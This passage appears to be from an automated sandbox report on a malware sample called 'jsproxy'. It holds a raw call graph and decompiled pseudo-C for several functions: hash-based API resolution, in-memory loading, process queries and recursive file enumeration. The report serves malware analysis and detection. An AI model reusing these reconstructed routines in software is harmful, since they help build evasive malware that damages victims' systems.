6838->6834 6840 2a34c0 GetPEB 6839->6840 6841 2a36c4 6840->6841 6842 2a36e5 6841->6842 6843 2a3f00 GetPEB 6841->6843 6846 2a3f00 GetPEB 6842->6846 6848 2a371a 6842->6848 6844 2a36d9 6843->6844 6845 2a3e60 GetPEB 6844->6845 6845->6842 6847 2a370e 6846->6847 6849 2a3e60 GetPEB 6847->6849 6850 2a3742 6848->6850 6851 2a3f00 GetPEB 6848->6851 6849->6848 6853 2a376e 6850->6853 6855 2a3f00 GetPEB 6850->6855 6852 2a3736 6851->6852 6854 2a3e60 GetPEB 6852->6854 6853->6049 6854->6850 6856 2a3762 6855->6856 6857 2a3e60 GetPEB 6856->6857 6857->6853 6864 2a7712 6858->6864 6859 2a77b3 6861 2a77d2 6859->6861 6863 2a3f00 GetPEB 6859->6863 6860 2a34c0 GetPEB 6860->6864 6861->6355 6862 2a78a3 6862->6355 6865 2a77c6 6863->6865 6864->6859 6864->6860 6864->6862 6866 2a3f00 GetPEB 6864->6866 6868 2a3e60 GetPEB 6864->6868 6867 2a3e60 GetPEB 6865->6867 6866->6864 6867->6861 6868->6864 7103 2a9b60 7106 2a9b80 7103->7106 7104 2a9d96 7105 2a9d12 7104->7105 7107 2a3f00 GetPEB 7104->7107 7106->7104 7106->7105 7108 2a9dd0 GetPEB 7106->7108 7111 2a3f00 GetPEB 7106->7111 7112 2a3e60 GetPEB 7106->7112 7109 2a9da9 7107->7109 7108->7106 7110 2a3e60 GetPEB 7109->7110 7110->7105 7111->7106 7112->7106 7113 2a47e0 7114 2a4c80 GetPEB 7113->7114 7115 2a47f5 7114->7115 5818 290170 5819 2901fb 5818->5819 5834 290ad0 5819->5834 5825 2902c4 5871 2906f0 5825->5871 5827 2902d0 5888 2908f0 5827->5888 5829 2902dc 5906 290580 5829->5906 5831 2902e8 5832 2902ef VirtualFree 5831->5832 5833 2902fb 5831->5833 5832->5833 5835 290b2f 5834->5835 5836 290bf0 VirtualAlloc 5835->5836 5839 2902ab 5835->5839 5837 290c1c 5836->5837 5838 290cdb VirtualAlloc 5837->5838 5837->5839 5838->5839 5840 290d60 5839->5840 5841 290d94 5840->5841 5842 290da3 VirtualAlloc RtlMoveMemory 5841->5842 5843 2902b8 5842->5843 5847 290ddb 5842->5847 5850 290400 GetCurrentProcess 5843->5850 5845 290e0d RtlMoveMemory 5845->5847 5846 290e3c VirtualAlloc 5846->5847 5847->5843 5847->5846 5848 290e6a RtlMoveMemory 5847->5848 5849 290e91 RtlFillMemory 5847->5849 5914 291140 lstrcpynW 5847->5914 5848->5843 5848->5847 5849->5843 5849->5847 5915 291140 lstrcpynW 5850->5915 5852 290459 NtQueryInformationProcess 5853 29046f 5852->5853 5856 2904c5 5852->5856 5854 290492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 5853->5854 5855 290484 GetProcessHeap HeapFree 5853->5855 5858 290575 5853->5858 5854->5853 5854->5856 5855->5854 5857 2904e5 5856->5857 5921 291140 lstrcpynW 5856->5921 5916 291140 lstrcpynW 5857->5916 5861 2904dc RtlMoveMemory 5861->5857 5862 2904ef RtlMoveMemory 5917 291140 lstrcpynW 5862->5917 5864 290511 RtlMoveMemory 5918 291140 lstrcpynW 5864->5918 5866 290528 RtlMoveMemory 5919 291140 lstrcpynW 5866->5919 5868 29053f RtlMoveMemory 5920 291140 lstrcpynW 5868->5920 5870 29055a RtlMoveMemory 5870->5825 5872 290740 5871->5872 5878 290744 5872->5878 5922 290fb0 5872->5922 5875 2907b5 RtlMoveMemory 5876 290770 5875->5876 5877 2907ff LoadLibraryA 5876->5877 5876->5878 5930 291140 lstrcpynW 5876->5930 5879 2908b9 5877->5879 5882 29080f 5877->5882 5878->5827 5879->5827 5881 29082d RtlMoveMemory 5881->5876 5881->5882 5882->5876 5882->5878 5883 290858 GetProcAddress 5882->5883 5887 290890 RtlMoveMemory 5882->5887 5931 291140 lstrcpynW 5882->5931 5932 291140 lstrcpynW 5882->5932 5883->5878 5883->5882 5885 290872 RtlMoveMemory 5933 291140 lstrcpynW 5885->5933 5887->5878 5887->5882 5889 290934 5888->5889 5890 290fb0 2 API calls 5889->5890 5891 290938 5889->5891 5892 290970 5890->5892 5891->5829 5892->5891 5936 291140 lstrcpynW 5892->5936 5894 2909af RtlMoveMemory 5894->5891 5899 2909c2 5894->5899 5897 2909f6 RtlMoveMemory 5897->5899 5898 290a97 RtlMoveMemory 5898->5899 5900 290aac 5898->5900 5899->5891 5937 291140 lstrcpynW 5899->5937 5938 291140 lstrcpynW 5899->5938 5940 291140 lstrcpynW 5899->5940 5900->5829 5902 290a3e RtlMoveMemory 5902->5891 5903 290a57 5902->5903 5939 291140 lstrcpynW 5903->5939 5905 290a61 RtlMoveMemory 5905->5899 5907 2905bc 5906->5907 5908 2905c0 5907->5908 5912 29069b VirtualProtect 5907->5912 5941 291140 lstrcpynW 5907->5941 5942 291140 lstrcpynW 5907->5942 5908->5831 5910 290617 RtlMoveMemory 5910->5907 5912->5907 5913 2906c6 5912->5913 5913->5831 5914->5845 5915->5852 5916->5862 5917->5864 5918->5866 5919->5868 5920->5870 5921->5861 5924 290fda 5922->5924 5923 29104a 5923->5876 5924->5923 5934 291140 lstrcpynW 5924->5934 5926 291001 5935 291140 lstrcpynW 5926->5935 5928 29101b RtlMoveMemory 5929 291029 5928->5929 5929->5876 5930->5875 5931->5881 5932->5885 5933->5882 5934->5926 5935->5928 5936->5894 5937->5897 5938->5902 5939->5905 5940->5898 5941->5910 5942->5907 6869 2a4b70 6870 2a4b82 6869->6870 6874 2a4b98 6869->6874 6871 2a3f00 GetPEB 6870->6871 6872 2a4b8c 6871->6872 6873 2a3e60 GetPEB 6872->6873 6873->6874 6875 2a4bd7 CreateProcessW 6874->6875 6876 2a3f00 GetPEB 6874->6876 6877 2a4c73 6875->6877 6878 2a4bf7 6875->6878 6879 2a4bc6 6876->6879 6880 2a4bff 6878->6880 6881 2a4c33 6878->6881 6883 2a3f00 GetPEB 6878->6883 6882 2a3e60 GetPEB 6879->6882 6887 2a4c5d 6881->6887 6888 2a3f00 GetPEB 6881->6888 6884 2a4bd2 6882->6884 6885 2a4c27 6883->6885 6884->6875 6886 2a3e60 GetPEB 6885->6886 6886->6881 6889 2a4c51 6888->6889 6890 2a3e60 GetPEB 6889->6890 6890->6887 6919 2a78b0 6929 2a7990 6919->6929 6920 2a34c0 GetPEB 6920->6929 6921 2a7c1e 6922 2a7c3d 6921->6922 6924 2a3f00 GetPEB 6921->6924 6923 2a7c05 6925 2a7c31 6924->6925 6926 2a3e60 GetPEB 6925->6926 6926->6922 6927 2a3e60 GetPEB 6927->6929 6928 2a3f00 GetPEB 6928->6929 6929->6920 6929->6921 6929->6923 6929->6927 6929->6928 6936 2a7fb0 6937 2a34c0 GetPEB 6936->6937 6938 2a7fc2 6937->6938 6939 2a3f00 GetPEB 6938->6939 6940 2a7fe3 6938->6940 6941 2a7fd7 6939->6941 6942 2a8029 6940->6942 6944 2a3f00 GetPEB 6940->6944 6943 2a3e60 GetPEB 6941->6943 6947 2a8051 6942->6947 6948 2a3f00 GetPEB 6942->6948 6943->6940 6945 2a801d 6944->6945 6946 2a3e60 GetPEB 6945->6946 6946->6942 6950 2a807d 6947->6950 6952 2a3f00 GetPEB 6947->6952 6949 2a8045 6948->6949 6951 2a3e60 GetPEB 6949->6951 6951->6947 6953 2a8071 6952->6953 6954 2a3e60 GetPEB 6953->6954 6954->6950 6955 2a64b0 6956 2a64ba 6955->6956 6961 2a64d0 6955->6961 6957 2a3f00 GetPEB 6956->6957 6958 2a64c4 6957->6958 6959 2a3e60 GetPEB 6958->6959 6959->6961 6960 2a659a 6961->6960 6962 2a42c0 GetPEB 6961->6962 6963 2a657b 6962->6963 6963->6960 6965 2a4160 6963->6965 6966 2a4172 6965->6966 6967 2a4180 6965->6967 6968 2a3f00 GetPEB 6966->6968 6967->6960 6969 2a4177 6968->6969 6970 2a3e60 GetPEB 6969->6970 6970->6967 7132 2a4df0 GetPEB 6971 2a6208 6979 2a6202 6971->6979 6972 2a4c80 GetPEB 6972->6979 6973 2a42c0 GetPEB 6973->6979 6974 2a624b 6975 2a55b0 GetPEB 6975->6979 6976 2a6490 6977 2a3f00 GetPEB 6981 2a642d 6977->6981 6978 2a3f00 GetPEB 6978->6979 6979->6972 6979->6973 6979->6974 6979->6975 6979->6978 6980 2a3e60 GetPEB 6979->6980 6979->6981 6980->6979 6981->6976 6981->6977 6982 2a3e60 GetPEB 6981->6982 6982->6981 6983 2a6608 7025 2a65fd 6983->7025 6984 2a94d0 GetPEB 6984->7025 6985 2a8bb0 2 API calls 6985->7025 6986 2a706e 6995 2a8740 3 API calls 6986->6995 6987 2a9f30 GetPEB 6987->7025 6988 2a68df 6989 2a6dcd 6996 2ab2e0 GetPEB 6989->6996 6990 2a7410 GetPEB 6990->7025 6991 2a7061 7003 2a8d40 2 API calls 6991->7003 6992 2a72d0 GetPEB 6992->7025 6993 2a9050 GetPEB 6993->7025 6994 2ab1d0 GetPEB 6994->7025 7005 2a7073 6995->7005 6996->6988 6997 2a53d0 GetPEB 6997->7025 6998 2a6f27 GetTickCount 6998->7025 6999 2a9270 GetPEB 6999->7025 7000 2a7120 3 API calls 7000->7025 7001 2a8700 GetPEB 7001->7025 7002 2a9860 6 API calls 7002->7025 7012 2a7066 7003->7012 7004 2a61e0 GetPEB 7004->7025 7006 2a80a0 3 API calls 7006->7025 7007 2a3e60 GetPEB 7007->7025 7008 2a12b0 2 API calls 7008->7025 7009 2ab430 3 API calls 7009->7025 7010 2a8970 2 API calls 7010->7025 7011 2a3f00 GetPEB 7011->7025 7013 2a4770 2 API calls 7013->7025 7014 2a3310 GetPEB 7014->7025 7015 2a4220 GetPEB 7015->7025 7016 2a6060 GetPEB 7016->7025 7017 2a8400 2 API calls 7017->7025 7018 2a8e80 2 API calls 7018->7025 7019 2a9620 2 API calls 7019->7025 7020 2a6975 GetTickCount 7020->7025 7021 2a1840 GetPEB 7021->7025 7022 2aafe0 GetPEB 7022->7025 7023 2a3460 GetPEB 7023->7025 7024 2a4160 GetPEB 7024->7025 7025->6984 7025->6985 7025->6986 7025->6987 7025->6988 7025->6989 7025->6990 7025->6991 7025->6992 7025->6993 7025->6994 7025->6997 7025->6998 7025->6999 7025->7000 7025->7001 7025->7002 7025->7004 7025->7006 7025->7007 7025->7008 7025->7009 7025->7010 7025->7011 7025->7013 7025->7014 7025->7015 7025->7016 7025->7017 7025->7018 7025->7019 7025->7020 7025->7021 7025->7022 7025->7023 7025->7024 5969 2a3780 5970 2a37ab 5969->5970 5971 2a3795 5969->5971 5975 2a37dd 5970->5975 5976 2a3f00 GetPEB 5970->5976 5972 2a3f00 GetPEB 5971->5972 5973 2a379f 5972->5973 5974 2a3e60 GetPEB 5973->5974 5974->5970 5979 2a3812 5975->5979 5980 2a3f00 GetPEB 5975->5980 5977 2a37d1 5976->5977 5978 2a3e60 GetPEB 5977->5978 5978->5975 5983 2a384a 5979->5983 5984 2a3f00 GetPEB 5979->5984 5981 2a3806 5980->5981 5982 2a3e60 GetPEB 5981->5982 5982->5979 5987 2a3876 5983->5987 5988 2a3f00 GetPEB 5983->5988 5985 2a383e 5984->5985 5986 2a3e60 GetPEB 5985->5986 5986->5983 5991 2a38d1 SHFileOperationW 5987->5991 5992 2a3f00 GetPEB 5987->5992 5989 2a386a 5988->5989 5990 2a3e60 GetPEB 5989->5990 5990->5987 5993 2a38c0 5992->5993 5994 2a3e60 GetPEB 5993->5994 5995 2a38cc 5994->5995 5995->5991 7038 2a2b80 7039 2a2b99 7038->7039 7040 2a2baf 7038->7040 7041 2a3f00 GetPEB 7039->7041 7042 2a2ba3 7041->7042 7043 2a3e60 GetPEB 7042->7043 7043->7040 7139 2a7e40 7141 2a7e50 7139->7141 7140 2a7f83 7143 2a38f0 2 API calls 7140->7143 7141->7140 7142 2a7f7a 7141->7142 7145 2a34c0 GetPEB 7141->7145 7146 2a3e60 GetPEB 7141->7146 7147 2a3f00 GetPEB 7141->7147 7144 2a7f96 7143->7144 7145->7141 7146->7141 7147->7141 7059 2aa198 7079 2aa189 7059->7079 7060 2aacd0 GetPEB 7060->7079 7061 2aa552 7066 2a3f00 GetPEB 7061->7066 7067 2aa571 7061->7067 7062 2aa439 7063 2a1150 GetPEB 7063->7079 7064 2a4220 GetPEB 7064->7079 7065 2a34c0 GetPEB 7065->7079 7069 2aa565 7066->7069 7070 2aa599 7067->7070 7074 2a3f00 GetPEB 7067->7074 7068 2a4b70 2 API calls 7068->7079 7071 2a3e60 GetPEB 7069->7071 7071->7067 7072 2ab520 GetPEB 7072->7079 7073 2a3f00 GetPEB 7073->7079 7075 2aa58d 7074->7075 7077 2a3e60 GetPEB 7075->7077 7076 2a3460 GetPEB 7076->7079 7077->7070 7078 2a3e60 GetPEB 7078->7079 7079->7060 7079->7061 7079->7062 7079->7063 7079->7064 7079->7065 7079->7068 7079->7072 7079->7073 7079->7076 7079->7078 7148 2a1fd8 7154 2a1fd2 7148->7154 7149 2a2212 7150 2a2208 7149->7150 7151 2a4220 GetPEB 7149->7151 7151->7150 7152 2a42c0 GetPEB 7152->7154 7153 2a3f00 GetPEB 7153->7154 7154->7149 7154->7150 7154->7152 7154->7153 7155 2a3e60 GetPEB 7154->7155 7155->7154 7080 2ab110 7081 2ab124 7080->7081 7082 2a6060 GetPEB 7081->7082 7091 2ab1aa 7081->7091 7083 2ab136 7082->7083 7084 2a3310 GetPEB 7083->7084 7085 2ab14c 7084->7085 7086 2a3f00 GetPEB 7085->7086 7089 2ab182 7085->7089 7087 2ab176 7086->7087 7088 2a3e60 GetPEB 7087->7088 7088->7089 7090 2a3f00 GetPEB 7089->7090 7089->7091 7092 2ab19e 7090->7092 7093 2a3e60 GetPEB 7092->7093 7093->7091

                                                                                Executed Functions

                                                                                Function 00290400, Relevance: 21.1, APIs: 14, Instructions: 132memorynativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 00290448
                                                                                  • Part of subcall function 00291140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00290EFD,00000000), ref: 00291155
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 00290463
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00290484
                                                                                • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 0029048D
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00290492
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 0029049F
                                                                                • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 002904A6
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 002904B9
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 002904E0
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 002904F7
                                                                                • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 00290519
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 00290530
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 00290547
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 00290562
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305527112.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_290000_jsproxy.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 482429597-0
                                                                                • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction ID: c2ad199e56ffb8a0bab513d7ded0f18003d47d1950e580cec91dbf3b621b854e
                                                                                • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction Fuzzy Hash: 784150B19243457EEB10EB62C846F6FB3EDAB88740F408D1CB74897291D675D9348F62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A38F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 375 2a38f0-2a390b 376 2a3910-2a3915 375->376 377 2a391b 376->377 378 2a3a69-2a3a6e 376->378 379 2a3a5f-2a3a64 377->379 380 2a3921-2a3926 377->380 381 2a3acc-2a3adf call 2a34c0 378->381 382 2a3a70-2a3a75 378->382 379->376 383 2a392c-2a3931 380->383 384 2a3a17-2a3a1e 380->384 403 2a3afc-2a3b17 381->403 404 2a3ae1-2a3af7 call 2a3f00 call 2a3e60 381->404 386 2a3ab6-2a3abb 382->386 387 2a3a77-2a3a7e 382->387 391 2a3b70-2a3b77 383->391 392 2a3937-2a393c 383->392 388 2a3a3b-2a3a4f FindFirstFileW 384->388 389 2a3a20-2a3a36 call 2a3f00 call 2a3e60 384->389 386->376 390 2a3ac1-2a3acb 386->390 394 2a3a9b-2a3ab1 387->394 395 2a3a80-2a3a96 call 2a3f00 call 2a3e60 387->395 400 2a3b97-2a3ba1 388->400 401 2a3a55-2a3a5a 388->401 389->388 398 2a3b79-2a3b8f call 2a3f00 call 2a3e60 391->398 399 2a3b94 391->399 392->386 402 2a3942-2a3947 392->402 394->376 395->394 398->399 399->400 401->376 409 2a394d-2a3953 402->409 410 2a39f1-2a3a12 402->410 423 2a3b19-2a3b2f call 2a3f00 call 2a3e60 403->423 424 2a3b34-2a3b3f 403->424 404->403 416 2a3974-2a3976 409->416 417 2a3955-2a395d 409->417 410->376 419 2a3978-2a398b call 2a34c0 416->419 420 2a396d-2a3972 416->420 417->420 427 2a395f-2a3963 417->427 437 2a39a8-2a39ec call 2a38f0 call 2a3460 419->437 438 2a398d-2a39a3 call 2a3f00 call 2a3e60 419->438 420->376 423->424 440 2a3b5c-2a3b6b 424->440 441 2a3b41-2a3b57 call 2a3f00 call 2a3e60 424->441 427->416 433 2a3965-2a396b 427->433 433->416 433->420 437->376 438->437 440->376 441->440
                                                                                C-Code - Quality: 63%
                                                                                			E002A38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				signed int _t34;
				void* _t39;
				intOrPtr* _t42;
				signed int _t46;
				intOrPtr* _t50;
				intOrPtr _t55;
				void* _t56;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t98;

				_t91 = __ecx;
				_t95 = __edx;
				_v1640 = __ecx;
				_t22 = 0x25a25425;
				_t56 = _v1640;
				while(1) {
					L1:
					_t98 = _t22 - 0x25a25425;
					if(_t98 > 0) {
						break;
					}
					if(_t98 == 0) {
						_t22 = 0x29bc40d3;
						continue;
					} else {
						if(_t22 == 0x8a099c9) {
							if( *0x2ae430 == 0) {
								 *0x2ae430 = E002A3E60(_t56, E002A3F00(0x9bab0b12), 0x83efb111, _t95);
							}
							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t56 = _t39;
							if(_t56 == 0xffffffff) {
								return _t39;
							} else {
								_t22 = 0x1a4f9837;
								continue;
							}
						} else {
							if(_t22 == 0xb46fa16) {
								_t42 =  *0x2adba4;
								if(_t42 == 0) {
									_t42 = E002A3E60(_t56, E002A3F00(0x9bab0b12), 0xd274268a, _t95);
									 *0x2adba4 = _t42;
								}
								return  *_t42(_t56);
							}
							if(_t22 != 0x1a4f9837) {
								L27:
								if(_t22 != 0x55fa1f4) {
									continue;
								} else {
									return _t22;
								}
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t46 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L12:
										if(_t95 == 0) {
											goto L11;
										} else {
											_t94 = E002A34C0(0x2ad290);
											_t50 =  *0x2ae158;
											if(_t50 == 0) {
												_t50 = E002A3E60(_t56, E002A3F00(0xc6fbcd74), 0xba71dd03, _t95);
												 *0x2ae158 = _t50;
											}
											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
											E002A38F0( &_v1044, _t95, _a4, _a8);
											_t96 = _t96 + 0x1c;
											E002A3460(_t94);
											_t22 = 0x36cb81de;
										}
									} else {
										_t55 = _v1590;
										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
											L11:
											_t22 = 0x36cb81de;
										} else {
											goto L12;
										}
									}
								}
								continue;
							}
						}
					}
					L40:
				}
				if(_t22 == 0x29bc40d3) {
					_t93 = E002A34C0(0x2ad260);
					_t24 =  *0x2ae158;
					if(_t24 == 0) {
						_t24 = E002A3E60(_t56, E002A3F00(0xc6fbcd74), 0xba71dd03, _t95);
						 *0x2ae158 = _t24;
					}
					 *_t24( &_v524, 0x104, _t93, _t91);
					_t26 =  *0x2ae494;
					_t96 = _t96 + 0x10;
					if(_t26 == 0) {
						_t26 = E002A3E60(_t56, E002A3F00(0x9bab0b12), 0x7facde30, _t95);
						 *0x2ae494 = _t26;
					}
					_t92 =  *_t26();
					_t28 =  *0x2adf30;
					if(_t28 == 0) {
						_t28 = E002A3E60(_t56, E002A3F00(0x9bab0b12), 0x5010a54d, _t95);
						 *0x2adf30 = _t28;
					}
					 *_t28(_t92, 0, _t93);
					_t91 = _v1652;
					_t22 = 0x8a099c9;
					goto L1;
				} else {
					if(_t22 != 0x36cb81de) {
						goto L27;
					} else {
						_t33 =  *0x2adf88;
						if(_t33 == 0) {
							_t33 = E002A3E60(_t56, E002A3F00(0x9bab0b12), 0xa53a5b1a, _t95);
							 *0x2adf88 = _t33;
						}
						_t34 =  *_t33(_t56,  &_v1636);
						asm("sbb eax, eax");
						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
						goto L1;
					}
				}
				goto L40;
			}































                                                                                0x002a38fa
                                                                                0x002a38fc
                                                                                0x002a38fe
                                                                                0x002a3902
                                                                                0x002a3907
                                                                                0x002a3910
                                                                                0x002a3910
                                                                                0x002a3910
                                                                                0x002a3915
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a391b
                                                                                0x002a3a5f
                                                                                0x00000000
                                                                                0x002a3921
                                                                                0x002a3926
                                                                                0x002a3a1e
                                                                                0x002a3a36
                                                                                0x002a3a36
                                                                                0x002a3a48
                                                                                0x002a3a4a
                                                                                0x002a3a4f
                                                                                0x002a3ba1
                                                                                0x002a3a55
                                                                                0x002a3a55
                                                                                0x00000000
                                                                                0x002a3a55
                                                                                0x002a392c
                                                                                0x002a3931
                                                                                0x002a3b70
                                                                                0x002a3b77
                                                                                0x002a3b8a
                                                                                0x002a3b8f
                                                                                0x002a3b8f
                                                                                0x00000000
                                                                                0x002a3b95
                                                                                0x002a393c
                                                                                0x002a3ab6
                                                                                0x002a3abb
                                                                                0x00000000
                                                                                0x002a3acb
                                                                                0x002a3acb
                                                                                0x002a3acb
                                                                                0x002a3942
                                                                                0x002a3947
                                                                                0x002a39fd
                                                                                0x002a3a06
                                                                                0x002a3a0d
                                                                                0x002a394d
                                                                                0x002a3953
                                                                                0x002a3974
                                                                                0x002a3976
                                                                                0x00000000
                                                                                0x002a3978
                                                                                0x002a3982
                                                                                0x002a3984
                                                                                0x002a398b
                                                                                0x002a399e
                                                                                0x002a39a3
                                                                                0x002a39a3
                                                                                0x002a39bc
                                                                                0x002a39d8
                                                                                0x002a39dd
                                                                                0x002a39e2
                                                                                0x002a39e7
                                                                                0x002a39e7
                                                                                0x002a3955
                                                                                0x002a3955
                                                                                0x002a395d
                                                                                0x002a396d
                                                                                0x002a396d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a395d
                                                                                0x002a3953
                                                                                0x00000000
                                                                                0x002a3947
                                                                                0x002a393c
                                                                                0x002a3926
                                                                                0x00000000
                                                                                0x002a391b
                                                                                0x002a3a6e
                                                                                0x002a3ad6
                                                                                0x002a3ad8
                                                                                0x002a3adf
                                                                                0x002a3af2
                                                                                0x002a3af7
                                                                                0x002a3af7
                                                                                0x002a3b0b
                                                                                0x002a3b0d
                                                                                0x002a3b12
                                                                                0x002a3b17
                                                                                0x002a3b2a
                                                                                0x002a3b2f
                                                                                0x002a3b2f
                                                                                0x002a3b36
                                                                                0x002a3b38
                                                                                0x002a3b3f
                                                                                0x002a3b52
                                                                                0x002a3b57
                                                                                0x002a3b57
                                                                                0x002a3b60
                                                                                0x002a3b62
                                                                                0x002a3b66
                                                                                0x00000000
                                                                                0x002a3a70
                                                                                0x002a3a75
                                                                                0x00000000
                                                                                0x002a3a77
                                                                                0x002a3a77
                                                                                0x002a3a7e
                                                                                0x002a3a91
                                                                                0x002a3a96
                                                                                0x002a3a96
                                                                                0x002a3aa1
                                                                                0x002a3aa5
                                                                                0x002a3aac
                                                                                0x00000000
                                                                                0x002a3aac
                                                                                0x002a3a75
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 002A3A48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: .
                                                                                • API String ID: 1974802433-248832578
                                                                                • Opcode ID: ada948065a69a4d432ad6da8d3ca3dbacb24cf7d6bf8b2394e4fa1a99db2347d
                                                                                • Instruction ID: 916440c487e03bb16fa94069c98967007fdff78914de80f7471710c252e910d3
                                                                                • Opcode Fuzzy Hash: ada948065a69a4d432ad6da8d3ca3dbacb24cf7d6bf8b2394e4fa1a99db2347d
                                                                                • Instruction Fuzzy Hash: EE5125317342024BCF24EF68A845ABBB6A69BE3704F000919F556C7352EF75CF2587A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A5040, Relevance: 1.7, APIs: 1, Instructions: 248memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E002A5040(intOrPtr __ecx, intOrPtr __edx) {
				char _v4;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				void* _v36;
				intOrPtr _v44;
				signed int _v52;
				void* _v68;
				void* __ebx;
				void* __ebp;
				void* _t16;
				void* _t17;
				void* _t23;
				void* _t26;
				void* _t29;
				void* _t31;
				void* _t35;
				void* _t37;
				void* _t41;
				void* _t42;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t58;
				intOrPtr* _t101;
				void* _t103;
				signed int _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t115;
				void* _t116;

				_t101 = _v12;
				_t58 = 0;
				_v16 = __edx;
				_t112 = 0;
				_v20 = __ecx;
				_t104 = 0x1ca940c1;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t115 = _t104 - 0x12f72f95;
						if(_t115 <= 0) {
							break;
						}
						__eflags = _t104 - 0x26342ffd;
						if(__eflags > 0) {
							__eflags = _t104 - 0x2fab56c4;
							if(_t104 != 0x2fab56c4) {
								goto L40;
							} else {
								_t17 =  *0x2ae494;
								__eflags = _t17;
								if(_t17 == 0) {
									_t17 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x7facde30, _t112);
									 *0x2ae494 = _t17;
								}
								_t105 =  *_t17();
								__eflags =  *0x2add18;
								if( *0x2add18 == 0) {
									 *0x2add18 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x9ff0609c, _t112);
								}
								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
								_t58 = _t16;
								__eflags = _t58;
								if(_t58 != 0) {
									_t104 = 0x8956eec;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t23 =  *0x2ae484;
								__eflags = _t23;
								if(_t23 == 0) {
									_t23 = E002A3E60(_t58, E002A3F00(0x26f5757c), 0x9e91db81, _t112);
									 *0x2ae484 = _t23;
								}
								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
								asm("sbb esi, esi");
								_t26 =  *0x2ae18c;
								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
								__eflags = _t26;
								if(_t26 == 0) {
									_t26 = E002A3E60(_t58, E002A3F00(0x26f5757c), 0x268fe5f0, _t112);
									 *0x2ae18c = _t26;
								}
								_t16 =  *_t26(_v44);
								goto L40;
							} else {
								__eflags = _t104 - 0x1ca940c1;
								if(_t104 == 0x1ca940c1) {
									_t104 = 0x2fab56c4;
									continue;
								} else {
									__eflags = _t104 - 0x254bd927;
